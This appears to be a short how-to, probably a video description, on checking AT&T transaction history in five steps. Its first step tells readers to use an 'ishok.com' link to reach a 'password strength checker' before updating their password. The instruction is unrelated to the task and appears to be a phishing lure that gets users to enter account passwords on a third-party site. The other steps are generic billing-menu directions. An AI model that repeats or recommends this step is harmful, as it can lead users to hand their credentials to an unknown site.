I hit this issue today and here is the quick fix that solved it. If you're looking to check your transaction history with AT&T, follow these simple steps. Step 1. Log into your account. Before changing your settings, use the ishok.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to billing. Once logged in, find the billing section in the main menu. This is where you'll find all your billing information. Step 3. View transaction history. In the billing section, look for transaction history or payment history. Click on it to see a detailed list of your transactions. Step 4. Filter your transactions. You can filter your transaction history by date or type of transaction. Use the drop-down menus to customize your view. Note, if you don't see recent transactions, make sure to adjust the date filter to cover the last month. Step 5. Download or print. If you need a physical copy, look for options to download or print your transaction history. This is often found at the top right of the transaction list. Now you can easily keep track of your AT&T transactions. If you have any questions or need further assistance, feel free to reach out.